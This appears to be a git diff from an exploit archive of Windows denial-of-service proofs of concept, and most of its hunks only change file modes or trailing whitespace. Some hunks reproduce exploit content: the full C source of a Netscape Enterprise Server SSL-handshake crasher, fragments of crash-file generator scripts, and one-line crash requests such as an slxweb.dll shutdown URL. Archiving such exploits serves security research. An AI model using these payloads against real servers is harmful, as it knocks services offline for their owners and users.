a/platforms/windows/dos/18019.txt b/platforms/windows/dos/18019.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18024.txt b/platforms/windows/dos/18024.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18049.txt b/platforms/windows/dos/18049.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18052.php b/platforms/windows/dos/18052.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18078.txt b/platforms/windows/dos/18078.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18112.txt b/platforms/windows/dos/18112.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18140.c b/platforms/windows/dos/18140.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18165.txt b/platforms/windows/dos/18165.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18166.txt b/platforms/windows/dos/18166.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18188.txt b/platforms/windows/dos/18188.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18196.py b/platforms/windows/dos/18196.py index 9b920d65a..779b9acf8 100755 --- a/platforms/windows/dos/18196.py +++ b/platforms/windows/dos/18196.py @@ -60,9 +60,4 @@ try: connectionx.close() except socket.error: print "it couldn't connect" - time.sleep(2) - - - - - \ No newline at end of file + time.sleep(2) \ No newline at end of file diff --git a/platforms/windows/dos/18200.txt b/platforms/windows/dos/18200.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18256.txt b/platforms/windows/dos/18256.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18257.txt b/platforms/windows/dos/18257.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18268.txt b/platforms/windows/dos/18268.txt old mode 100755 new mode 100644 index ae9db2a73..679c19b04 --- a/platforms/windows/dos/18268.txt +++ b/platforms/windows/dos/18268.txt @@ -52,4 +52,4 @@ def main(): print "[*] Closing Socket...\n" s.close() if __name__ == "__main__": - main() \ No newline at end of file + main() \ No newline at end of file diff --git a/platforms/windows/dos/18269.py b/platforms/windows/dos/18269.py index 6e942723d..a7c21b00b 100755 --- a/platforms/windows/dos/18269.py +++ b/platforms/windows/dos/18269.py @@ -34,4 +34,4 @@ print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n" s.close() if __name__ == "__main__": -main() \ No newline at end of file +main() \ No newline at end of file diff --git a/platforms/windows/dos/18318.py b/platforms/windows/dos/18318.py index 80008fec0..c0fcd9fee 100755 --- a/platforms/windows/dos/18318.py +++ b/platforms/windows/dos/18318.py @@ -113,4 +113,4 @@ e.g. NetcutKiller.py wlan0 2.)Attack with protect himself Usage: NetcutKiller <Interface> <MAC_Gateway> e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF -''' \ No newline at end of file +''' \ No newline at end of file diff --git a/platforms/windows/dos/1838.html b/platforms/windows/dos/1838.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18427.txt b/platforms/windows/dos/18427.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18440.txt b/platforms/windows/dos/18440.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18453.txt b/platforms/windows/dos/18453.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18454.txt b/platforms/windows/dos/18454.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18461.html b/platforms/windows/dos/18461.html old mode 100755 new mode 100644 index 7ead15ab7..03f49ffdb --- a/platforms/windows/dos/18461.html +++ b/platforms/windows/dos/18461.html @@ -19,6 +19,4 @@ arg1=String(3092, "A") target.LicenseName = arg1 -</script> - - \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/dos/18463.html b/platforms/windows/dos/18463.html old mode 100755 new mode 100644 index 4b75224b3..80204cb69 --- a/platforms/windows/dos/18463.html +++ b/platforms/windows/dos/18463.html @@ -42,4 +42,4 @@ arg1=String(2068, "A") target.TitlebarText = arg1 -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/dos/18475.c b/platforms/windows/dos/18475.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18481.py b/platforms/windows/dos/18481.py index 0788ed278..2d9233aea 100755 --- a/platforms/windows/dos/18481.py +++ b/platforms/windows/dos/18481.py @@ -14,6 +14,4 @@ payload = (header+junk) f = open("Exploit.m3u","wb") f.write(payload) -f.close() - - \ No newline at end of file +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/18488.txt b/platforms/windows/dos/18488.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18489.txt b/platforms/windows/dos/18489.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18490.txt b/platforms/windows/dos/18490.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18491.txt b/platforms/windows/dos/18491.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18512.txt b/platforms/windows/dos/18512.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18546.txt b/platforms/windows/dos/18546.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1856.url b/platforms/windows/dos/1856.url old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18584.txt b/platforms/windows/dos/18584.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18586.txt b/platforms/windows/dos/18586.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18602.txt b/platforms/windows/dos/18602.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18606.txt b/platforms/windows/dos/18606.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18633.txt b/platforms/windows/dos/18633.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18636.txt b/platforms/windows/dos/18636.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18637.txt b/platforms/windows/dos/18637.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18641.txt b/platforms/windows/dos/18641.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18654.txt b/platforms/windows/dos/18654.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18661.txt b/platforms/windows/dos/18661.txt old mode 100755 new mode 100644 index 41d45119e..b67f43e9c --- a/platforms/windows/dos/18661.txt +++ b/platforms/windows/dos/18661.txt @@ -194,5 +194,4 @@ PoC = ("\x00\x00\x00\x1C\x66\x74\x79\x70\x6D\x70\x34\x32\x00\x00\x00\x00\x69\x73 payload = (PoC) f = open("PoC.mp4","wb") f.write(payload) -f.close() - \ No newline at end of file +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/18716.txt b/platforms/windows/dos/18716.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18717.txt b/platforms/windows/dos/18717.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18739.txt b/platforms/windows/dos/18739.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18755.c b/platforms/windows/dos/18755.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18757.txt b/platforms/windows/dos/18757.txt old mode 100755 new mode 100644 index 39e2b06a9..09a2ad997 --- a/platforms/windows/dos/18757.txt +++ b/platforms/windows/dos/18757.txt @@ -28,4 +28,4 @@ avi.write(Data) avi.close() print - "[-] MP4 file generated" \ No newline at end of file + "[-] MP4 file generated" \ No newline at end of file diff --git a/platforms/windows/dos/18765.txt b/platforms/windows/dos/18765.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18771.txt b/platforms/windows/dos/18771.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18774.txt b/platforms/windows/dos/18774.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18776.txt b/platforms/windows/dos/18776.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18777.txt b/platforms/windows/dos/18777.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18795.py b/platforms/windows/dos/18795.py index d9b05584c..09465de3e 100755 --- a/platforms/windows/dos/18795.py +++ b/platforms/windows/dos/18795.py @@ -33,6 +33,4 @@ Data = ("\x00\x00\x00\x1c\x66\x74\x79\x70\x6d\x70\x34\x32\x00\x00\x00\x00\x69\x7 avi = open('poc.mp4', 'wb+') avi.write(Data) -avi.close() - - \ No newline at end of file +avi.close() \ No newline at end of file diff --git a/platforms/windows/dos/18819.cpp b/platforms/windows/dos/18819.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18852.txt b/platforms/windows/dos/18852.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18853.txt b/platforms/windows/dos/18853.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18864.txt b/platforms/windows/dos/18864.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18878.txt b/platforms/windows/dos/18878.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18894.txt b/platforms/windows/dos/18894.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18916.txt b/platforms/windows/dos/18916.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18926.php b/platforms/windows/dos/18926.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18940.php b/platforms/windows/dos/18940.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18945.txt b/platforms/windows/dos/18945.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18946.txt b/platforms/windows/dos/18946.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18952.txt b/platforms/windows/dos/18952.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18956.c b/platforms/windows/dos/18956.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18958.html b/platforms/windows/dos/18958.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18964.txt b/platforms/windows/dos/18964.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18972.txt b/platforms/windows/dos/18972.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19034.cpp b/platforms/windows/dos/19034.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19089.txt b/platforms/windows/dos/19089.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19181.txt b/platforms/windows/dos/19181.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19182.txt b/platforms/windows/dos/19182.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19183.txt b/platforms/windows/dos/19183.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19207.txt b/platforms/windows/dos/19207.txt old mode 100755 new mode 100644 index 7f4dc201f..f40c993de --- a/platforms/windows/dos/19207.txt +++ b/platforms/windows/dos/19207.txt @@ -17,4 +17,4 @@ actually cause . the -. \ No newline at end of file +. \ No newline at end of file diff --git a/platforms/windows/dos/19238.txt b/platforms/windows/dos/19238.txt old mode 100755 new mode 100644 index 43a86872f..1852553c2 --- a/platforms/windows/dos/19238.txt +++ b/platforms/windows/dos/19238.txt @@ -6,4 +6,4 @@ Should an NT host claim the hostname of a "victim" NT host while that host is tu A situation has been noted wherein a Win95 host may register the victim hostname (with a WINS server) by setting the Win95 workgroup name equal to the victim's hostname. The next time the victim host is rebooted, it will fail to start the workstation and server services as the WINS server will report that the hostname is claimed by the Win95 host. -Set the Win95 workgroup name equal to the hostname for the victim NT host. If the WINS server registers this hostname, and the victim NT host is rebooted, it will fail to start its workstation and server services. \ No newline at end of file +Set the Win95 workgroup name equal to the hostname for the victim NT host. If the WINS server registers this hostname, and the victim NT host is rebooted, it will fail to start its workstation and server services. \ No newline at end of file diff --git a/platforms/windows/dos/19289.txt b/platforms/windows/dos/19289.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19328.txt b/platforms/windows/dos/19328.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19331.txt b/platforms/windows/dos/19331.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19332.txt b/platforms/windows/dos/19332.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19333.txt b/platforms/windows/dos/19333.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19334.txt b/platforms/windows/dos/19334.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19335.txt b/platforms/windows/dos/19335.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19336.txt b/platforms/windows/dos/19336.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19337.txt b/platforms/windows/dos/19337.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19338.txt b/platforms/windows/dos/19338.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19340.txt b/platforms/windows/dos/19340.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1935.cpp b/platforms/windows/dos/1935.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19372.txt b/platforms/windows/dos/19372.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19385.txt b/platforms/windows/dos/19385.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19389.txt b/platforms/windows/dos/19389.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19409.txt b/platforms/windows/dos/19409.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19413.c b/platforms/windows/dos/19413.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19414.c b/platforms/windows/dos/19414.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19415.c b/platforms/windows/dos/19415.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19416.c b/platforms/windows/dos/19416.c old mode 100755 new mode 100644 index d16039e63..9aa3b9c55 --- a/platforms/windows/dos/19416.c +++ b/platforms/windows/dos/19416.c @@ -1,132 +1,132 @@ +/* source: http://www.securityfocus.com/bid/516/info Netscape's Enterprise Server suffers from a buffer overflow error in the SSL handshaking code that causes it to crash when the buffer is overrun. +*/ - // - // nesexploit.c - v1.02 - by Arne Vidstrom, winnt@bahnhof.se - // - // This program crashes Netscape Enterprise Server when it is - // running in SSL mode, by exploiting a bug in the SSL handshake - // code. The server crashes if the client: - // - // * starts with SSL 2.0 format - // * uses long record header - // * uses padding >= 8 - // * sends at least 11 bytes more data than it specifies in the - // header - // * sends at least about 4 kb data - // - // I haven't included any error handling in the code because it's - // so boring to write... ;o) - // +// +// nesexploit.c - v1.02 - by Arne Vidstrom, winnt@bahnhof.se +// +// This program crashes Netscape Enterprise Server when it is +// running in SSL mode, by exploiting a bug in the SSL handshake +// code. The server crashes if the client: +// +// * starts with SSL 2.0 format +// * uses long record header +// * uses padding >= 8 +// * sends at least 11 bytes more data than it specifies in the +// header +// * sends at least about 4 kb data +// +// I haven't included any error handling in the code because it's +// so boring to write... ;o) +// - #include <winsock.h> - #include <string.h> - #include <stdio.h> +#include <winsock.h> +#include <string.h> +#include <stdio.h> - #define sockaddr_in struct sockaddr_in - #define sockaddr struct sockaddr +#define sockaddr_in struct sockaddr_in +#define sockaddr struct sockaddr - // Some combinations of these three constants will crash the server, - // others will not. +// Some combinations of these three constants will crash the server, +// others will not. - #define PADDING 8 - #define SPECIFIED_SIZE 11822 - #define ACTUAL_SIZE 11833 +#define PADDING 8 +#define SPECIFIED_SIZE 11822 +#define ACTUAL_SIZE 11833 - void main(void) - { - // IP address of the server - set to your own server and nobody - // elses :o) - char ipaddr[25] = "xxx.xxx.xxx.xxx"; +void main(void) +{ + // IP address of the server - set to your own server and nobody + // elses :o) + char ipaddr[25] = "xxx.xxx.xxx.xxx"; - // SSL port - unsigned short port = xxxxx; + // SSL port + unsigned short port = xxxxx; - SOCKET socket1; - unsigned char s[65536]; - int errorCode; - WSADATA winSockData; - sockaddr_in peer; - int result; - unsigned char i; - unsigned int l; - int flags; + SOCKET socket1; + unsigned char s[65536]; + int errorCode; + WSADATA winSockData; + sockaddr_in peer; + int result; + unsigned char i; + unsigned int l; + int flags; - printf("\nnesexploit.c - developed by Arne Vidstrom, - winnt@bahnhof.se\n\n"); + printf("\nnesexploit.c - developed by Arne Vidstrom, winnt@bahnhof.se\n\n"); - // Allocate a socket, connect and stuff... - errorCode = WSAStartup(0x0101, &winSockData); - socket1 = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); - peer.sin_family = AF_INET; - peer.sin_port = htons(port); - peer.sin_addr.s_addr = inet_addr(ipaddr); - for (i = 0; i < 8; i++) - peer.sin_zero[i] = 0; - result = connect(socket1, (sockaddr *) &peer, sizeof(peer)); - if (result != 0) - printf("Ehmn, where's that server? ;o)\n\n"); + // Allocate a socket, connect and stuff... + errorCode = WSAStartup(0x0101, &winSockData); + socket1 = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); + peer.sin_family = AF_INET; + peer.sin_port = htons(port); + peer.sin_addr.s_addr = inet_addr(ipaddr); + for (i = 0; i < 8; i++) + peer.sin_zero[i] = 0; + result = connect(socket1, (sockaddr *) &peer, sizeof(peer)); + if (result != 0) + printf("Ehmn, where's that server? ;o)\n\n"); - // Initialize the buffer with a lot of '.' Anything would do... - for (l=0; l<65536; l++) - s[l] = '.'; + // Initialize the buffer with a lot of '.' Anything would do... + for (l=0; l<65536; l++) + s[l] = '.'; - // Version 2.0 Format Header with padding. - // Shouldn't be any padding because this part is not encrypted, - // but without padding the server won't crash. :o) - s[0] = (SPECIFIED_SIZE & 0xff00) >> 8; - s[1] = (SPECIFIED_SIZE & 0x00ff); - s[2] = PADDING; + // Version 2.0 Format Header with padding. + // Shouldn't be any padding because this part is not encrypted, + // but without padding the server won't crash. :o) + s[0] = (SPECIFIED_SIZE & 0xff00) >> 8; + s[1] = (SPECIFIED_SIZE & 0x00ff); + s[2] = PADDING; - // Client says Hello! - s[3] = 0x01; + // Client says Hello! + s[3] = 0x01; - // Client wishes to use Version 3.0 later (there will be no "later" - though...) - s[4] = 0x03; - s[5] = 0x00; + // Client wishes to use Version 3.0 later (there will be no "later" though...) + s[4] = 0x03; + s[5] = 0x00; - // Cipher Specs Length = 3 - s[6] = 0x00; - s[7] = 0x0c; + // Cipher Specs Length = 3 + s[6] = 0x00; + s[7] = 0x0c; - // Session ID = 0 - s[8] = 0x00; - s[9] = 0x00; + // Session ID = 0 + s[8] = 0x00; + s[9] = 0x00; - // Challenge Length = 16 - s[10] = 0x00; - s[11] = 0x10; + // Challenge Length = 16 + s[10] = 0x00; + s[11] = 0x10; - // Challenge Specs Data - s[12] = 0x02; - s[13] = 0x00; - s[14] = 0x80; + // Challenge Specs Data + s[12] = 0x02; + s[13] = 0x00; + s[14] = 0x80; - s[15] = 0x04; - s[16] = 0x00; - s[17] = 0x80; + s[15] = 0x04; + s[16] = 0x00; + s[17] = 0x80; - s[18] = 0x00; - s[19] = 0x00; - s[20] = 0x03; + s[18] = 0x00; + s[19] = 0x00; + s[20] = 0x03; - s[21] = 0x00; - s[22] = 0x00; - s[23] = 0x06; + s[21] = 0x00; + s[22] = 0x00; + s[23] = 0x06; - // Challenge Data is a few '.' from above + // Challenge Data is a few '.' from above - // The rest is also '.' from above + // The rest is also '.' from above - // Send all this to the server - flags = 0; - result = send(socket1, s, ACTUAL_SIZE, flags); - if (result != SOCKET_ERROR) - printf("Done!\n\n"); + // Send all this to the server + flags = 0; + result = send(socket1, s, ACTUAL_SIZE, flags); + if (result != SOCKET_ERROR) + printf("Done!\n\n"); - // Clean up - closesocket(socket1); - WSACleanup(); - } \ No newline at end of file + // Clean up + closesocket(socket1); + WSACleanup(); +} \ No newline at end of file diff --git a/platforms/windows/dos/19445.txt b/platforms/windows/dos/19445.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19453.cpp b/platforms/windows/dos/19453.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19456.txt b/platforms/windows/dos/19456.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19471.html b/platforms/windows/dos/19471.html old mode 100755 new mode 100644 index 31e2bd982..f578021b2 --- a/platforms/windows/dos/19471.html +++ b/platforms/windows/dos/19471.html @@ -27,4 +27,4 @@ maxlength="99999999" value=""></td> </body> </html> ----{STOP SOURCE}--- \ No newline at end of file +---{STOP SOURCE}--- \ No newline at end of file diff --git a/platforms/windows/dos/19483.txt b/platforms/windows/dos/19483.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19489.txt b/platforms/windows/dos/19489.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19563.txt b/platforms/windows/dos/19563.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19575.txt b/platforms/windows/dos/19575.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19578.txt b/platforms/windows/dos/19578.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19596.txt b/platforms/windows/dos/19596.txt old mode 100755 new mode 100644 index 2f372a8de..9cb43a028 --- a/platforms/windows/dos/19596.txt +++ b/platforms/windows/dos/19596.txt @@ -4,4 +4,4 @@ BFTelnet, a telnet server for Windows NT by Byte Fusion, will crash if a user na telnet victim.com -Login: [3090 charcter string] \ No newline at end of file +Login: [3090 charcter string] \ No newline at end of file diff --git a/platforms/windows/dos/19616.c b/platforms/windows/dos/19616.c old mode 100755 new mode 100644 index 6206a6fe2..0007f10c2 --- a/platforms/windows/dos/19616.c +++ b/platforms/windows/dos/19616.c @@ -1,9 +1,10 @@ +/* source: http://www.securityfocus.com/bid/789/info There is a buffer overflow in the username field when the username is between 200 and 500 characters. Although it may be possible to execute arbitrary code on the vulnerable server, current exploits only cause a denial of service on the remote machine. Exploit (by Interrupt): - +*/ /* * IMAIL 5.07 POP3 Overflow diff --git a/platforms/windows/dos/19619.txt b/platforms/windows/dos/19619.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19624.txt b/platforms/windows/dos/19624.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19636.txt b/platforms/windows/dos/19636.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19638.c b/platforms/windows/dos/19638.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19639.txt b/platforms/windows/dos/19639.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19640.txt b/platforms/windows/dos/19640.txt old mode 100755 new mode 100644 index cd620d5c4..e6733d4b5 --- a/platforms/windows/dos/19640.txt +++ b/platforms/windows/dos/19640.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/823/info Alt-N's WorldClient is an email webserver that allows it's users to retrieve email via HTTP. It is susceptible to denial of service attacks due to an unchecked buffer in the request handler. Supplying a long url will crash the server. -http ://target.host:2000/[long string] \ No newline at end of file +http ://target.host:2000/[long string] \ No newline at end of file diff --git a/platforms/windows/dos/19664.txt b/platforms/windows/dos/19664.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19666.txt b/platforms/windows/dos/19666.txt old mode 100755 new mode 100644 index 2924cb759..e1ec988fc --- a/platforms/windows/dos/19666.txt +++ b/platforms/windows/dos/19666.txt @@ -18,4 +18,4 @@ Welcome to GoodTech Telnet Server for Windows NT (V2.2) (Evaluation Copy) Login username: (32870 characters) -...server crash \ No newline at end of file +...server crash \ No newline at end of file diff --git a/platforms/windows/dos/1967.c b/platforms/windows/dos/1967.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19695.txt b/platforms/windows/dos/19695.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19702.txt b/platforms/windows/dos/19702.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19703.txt b/platforms/windows/dos/19703.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19711.txt b/platforms/windows/dos/19711.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19716.txt b/platforms/windows/dos/19716.txt old mode 100755 new mode 100644 index 1c993c4f7..ac25c8935 --- a/platforms/windows/dos/19716.txt +++ b/platforms/windows/dos/19716.txt @@ -237,4 +237,4 @@ end; ############################################################################# -Possible implementation of a phishing attack by modifying the file etc \ hosts host system, all changes in it are also automatically applied for the secure session. \ No newline at end of file +Possible implementation of a phishing attack by modifying the file etc \ hosts host system, all changes in it are also automatically applied for the secure session. \ No newline at end of file diff --git a/platforms/windows/dos/19720.c b/platforms/windows/dos/19720.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19725.txt b/platforms/windows/dos/19725.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19740.c b/platforms/windows/dos/19740.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19748.txt b/platforms/windows/dos/19748.txt old mode 100755 new mode 100644 index 0fb92f88f..d97bea0bf --- a/platforms/windows/dos/19748.txt +++ b/platforms/windows/dos/19748.txt @@ -9,4 +9,4 @@ user username +OK valid pass password +OK Authorized -RETR 11111111111 \ No newline at end of file +RETR 11111111111 \ No newline at end of file diff --git a/platforms/windows/dos/19755.txt b/platforms/windows/dos/19755.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19759.c b/platforms/windows/dos/19759.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1976.cpp b/platforms/windows/dos/1976.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19760.txt b/platforms/windows/dos/19760.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19772.txt b/platforms/windows/dos/19772.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19777.txt b/platforms/windows/dos/19777.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19783.txt b/platforms/windows/dos/19783.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19799.txt b/platforms/windows/dos/19799.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19806.c b/platforms/windows/dos/19806.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19807.txt b/platforms/windows/dos/19807.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19810.txt b/platforms/windows/dos/19810.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19820.txt b/platforms/windows/dos/19820.txt old mode 100755 new mode 100644 index ca8374767..f068dac9e --- a/platforms/windows/dos/19820.txt +++ b/platforms/windows/dos/19820.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1076/info Requesting a URL containing a string of exactly eight characters following the /cgi-bin/ directory (17 characters in total) will cause AnalogX SimpleServer:WWW to shut down. -http://target/cgi-bin/<8 character long string> \ No newline at end of file +http://target/cgi-bin/<8 character long string> \ No newline at end of file diff --git a/platforms/windows/dos/19827.txt b/platforms/windows/dos/19827.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19834.txt b/platforms/windows/dos/19834.txt old mode 100755 new mode 100644 index e3a3a18c5..350710f17 --- a/platforms/windows/dos/19834.txt +++ b/platforms/windows/dos/19834.txt @@ -6,4 +6,4 @@ This vulnerability may be exploited remotely if such a URL were embedded in a HT So far only the Windows versions of the Real Player have been proven to be vulnerable in this manner. -http://<string containing over 300 characters> \ No newline at end of file +http://<string containing over 300 characters> \ No newline at end of file diff --git a/platforms/windows/dos/19835.txt b/platforms/windows/dos/19835.txt old mode 100755 new mode 100644 index b0a631622..c8f01dbb5 --- a/platforms/windows/dos/19835.txt +++ b/platforms/windows/dos/19835.txt @@ -11,4 +11,4 @@ will cause the slxweb.dll process to shutdown. Possibly other commands aside fro Additional notes: The program which issues administrative commands (slxweb.dll) is installed by default in the /scripts directory and cannot be relocated. In addition to this security concern, the package requires a user to change the default anonymous username (IUSR_{systemname}) in Microsoft IIS to 'slxwebuser' and grant it administrative privileges. -http://target/scripts/slxweb.dll/admin?command=shutdown \ No newline at end of file +http://target/scripts/slxweb.dll/admin?command=shutdown \ No newline at end of file diff --git a/platforms/windows/dos/19843.java b/platforms/windows/dos/19843.java old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19853.txt b/platforms/windows/dos/19853.txt old mode 100755 new mode 100644 index 4f58dd8c6..edd132160 --- a/platforms/windows/dos/19853.txt +++ b/platforms/windows/dos/19853.txt @@ -5,4 +5,4 @@ The htimage.exe and imagemap.exe files included with FrontPage handle server-sid If the mapname portion of the request is replaced with 741 or more characters, the webserver software will crash, although the operating system will continue to function normally. Stack dumps reveal that user-supplied data occasionally makes it to the EIP register, making the execution of remote arbitrary code potentially possible. To crash the server: -http:&nbsp;//target/path/htimage.exe/<741+characters>?0,0 \ No newline at end of file +http:&nbsp;//target/path/htimage.exe/<741+characters>?0,0 \ No newline at end of file diff --git a/platforms/windows/dos/19856.txt b/platforms/windows/dos/19856.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19880.txt b/platforms/windows/dos/19880.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19884.txt b/platforms/windows/dos/19884.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19885.txt b/platforms/windows/dos/19885.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1989.html b/platforms/windows/dos/1989.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1990.html b/platforms/windows/dos/1990.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19907.txt b/platforms/windows/dos/19907.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19940.c b/platforms/windows/dos/19940.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19941.casl b/platforms/windows/dos/19941.casl old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19960.txt b/platforms/windows/dos/19960.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19961.txt b/platforms/windows/dos/19961.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19962.txt b/platforms/windows/dos/19962.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/19963.txt b/platforms/windows/dos/19963.txt old mode 100755 new mode 100644 diff 